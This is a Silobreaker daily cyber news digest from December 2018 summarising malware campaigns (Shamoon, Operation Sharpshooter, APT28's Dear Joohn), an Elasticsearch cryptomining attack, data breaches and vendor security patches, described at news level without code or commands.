Silobreaker Daily Cyber Digest – 13 December 2018
Shamoon variants appear in the wild, possibly used in attack against Saipem
- Chronicle researchers discovered that two new samples of Shamoon malware were uploaded to VirusTotal from Italy on December 10th, 2018.
- The timing of the upload corresponds with the recent cyber attack against Italian oil company Saipem. In an update on the attack, Saipem claimed it was targeted by a Shamoon variant.
- Bleeping Computer note that that one of the variants may have been uploaded to VirusTotal by Saipem in their efforts to determine the nature of the malware that affected them. However, Chronicle’s investigation is still ongoing, and no definite results have been produced to date.
- Shamoon is disk-wiping malware that targeted Saudi Aramco in 2012, erasing data from over 35,000 devices. Four years later, in 2016, the malware was seen in attacks against private organizations in the Middle East.
Operation Sharpshooter targets global defence and critical infrastructure
- McAfee researchers discovered a new global campaign dubbed Operation Sharpshooter, that has focused on organizations predominantly in nuclear, defence, energy and financial sectors. In October and November 2018, the campaign targeted 87 organizations worldwide, primarily those based in the US.
- The first stage of the attack involves a document containing malicious macros that, once enabled, download a second-stage implant dubbed by McAfee as Rising Sun. Rising Sun is a fully functional backdoor used for reconnaissance on the victim’s system. The information the implant gathers is used to determine the next steps of the operation. The backdoor uses source code from the Duuzer Trojan used by the Lazarus Group.
- Based on several similarities with other Lazarus Group attacks, the researchers do not rule out the possibility of the Group being behind the operation, however they do warn these could just be false flags.
Source (Includes IOCs)
Trend Micro observe cryptocurrency spreading via old bugs on Elasticsearch
- The attack utilised two vulnerabilities. These include CVE-2015-1427, a flaw in Elasticsearch’s Groovy scripting engine that allows remote attackers to execute arbitrary shell commands through a crafted script, and CVE-2014-3120, a flaw in the default configuration of Elasticsearch.
- Once the attacker gains the ability to run arbitrary commands on the infected system, they can attempt to escalate privileges or pivot to other systems. The payload downloads two files, devtools and config[.]json. The script then deploys the CoinMiner cryptocurrency miner.
- If other miners are detected in the system then running processes are stopped. The miner uses cron to run every ten minutes.
Source (Includes IOCs)
APT28’s Dear Joohn campaign targets NATO-aligned and former USSR states
- Researchers from Palo Alto Networks’ Unit 42 identified a new campaign by APT28 dubbed Dear Joohn. Based on the analysis of the threat actor’s activity between mid-October to mid-November 2018, the researchers uncovered that the campaign delivered variants of either Zebrocy or Cannon, targeting government agencies of NATO-aligned and former USSR nation states across four continents.
- The attack vector consisted of spear phishing emails sent from accounts registered to a legitimate Czech service provider. These distributed Word files containing generic lure images that tricked victims into enabling macros. The file names often featured topics relating to current events to entice users into opening the malicious attachments.
Source (Includes IOCs)
Recently patched zero day being exploited in the wild
- Researchers at Kaspersky Lab have discovered that CVE-2018-8611, a recently patched zero-day vulnerability, is being exploited in the wild by a new threat group known as SandCat, who have been aiming their attacks at entities in Africa and the Middle East.
- Several different builds of an exploit leveraging the vulnerability were discovered, including one adapted for the latest Windows versions.
Leaks and Breaches
Misconfigured server exposes taxpayer ID numbers for 120 million Brazilian citizens
- InfoArmor found that a misconfigured Apache web server exposed the taxpayer identification numbers, also known as Cadastro de Pessoas Físicas (CPFs), of 120 million Brazilian nationals. The server was discovered in March 2018, but it is unknown for how long the data was exposed or whether it was discovered by other parties.
- InfoArmor found that each exposed CPF was also linked to a person’s personally identifiable information, including their banks, loans, repayments, credit and debit history, voting history, full name, emails, and more.
US school department suffers data breach
- Approximately 2,000 former and current employees of the AOS 77 school district in Washington County, Maine, have been alerted to a data breach that may have resulted in their personal information being compromised. The information breached allegedly included dates of birth, addresses and Social Security numbers, however, no information about students was involved.
Mozilla release security updates to fix bugs in Firefox and Firefox ESR
- A total of 17 flaws were addressed, three of which were rated critical and four rated high. The critical flaws are memory safety bugs in both Firefox 64 and Firefox ESR 60.4 tagged as CVE-2018-12406 and CVE-2018-12405.
SAP release patch for critical vulnerability in Hybris Commerce
- CVE-2018-2505 is a critical cross-site scripting vulnerability in SAP Hybris Commerce storefronts. The vulnerability has been given a 9.3 CVSS rating.
- The flaw could be exploited by an attacker if they were able to trick a user into clicking on a specially crafted link. If successful, the attacker could then inject a malicious script into a page.
Shipping industry releases guidelines on cyber threats, provides examples of past incidents
- A conglomerate of 21 international shipping associations and industry groups released ‘Guidelines on Cyber Security onboard Ships’, that document potential cyber threats that can occur aboard ships or at ports.
- The report also features several past cyber incidents, for example the case of the Electronic Chart Display and Information System (ECDIS) being infected by a virus, delaying the ship’s sail and causing costs of repairs amounting to hundreds of thousands of dollars. Other incidents include a ransomware infection of a ship’s systems or the use of USB thumb drives to infect systems with malware.
Supermicro dismisses reports of malicious hardware
- Several weeks ago, Bloomberg published a story alleging that Chinese intelligence services were planting malicious components in Supermicro motherboards during the manufacturing process. In response to these allegations, Supermicro have conducted an investigation, in collaboration with a third-party, which led them to claim that no malicious hardware was detected on any of their motherboards, and no evidence exists to suggest that this has ever happened.
The Silobreaker Team
Disclaimer: Although Silobreaker has relied on what it regards as reliable sources while compiling the content herein, Silobreaker cannot guarantee the accuracy, completeness, integrity or quality of such content and no responsibility is accepted by Silobreaker in respect of such content. Readers must determine for themselves what reliance they should place on the compiled content herein.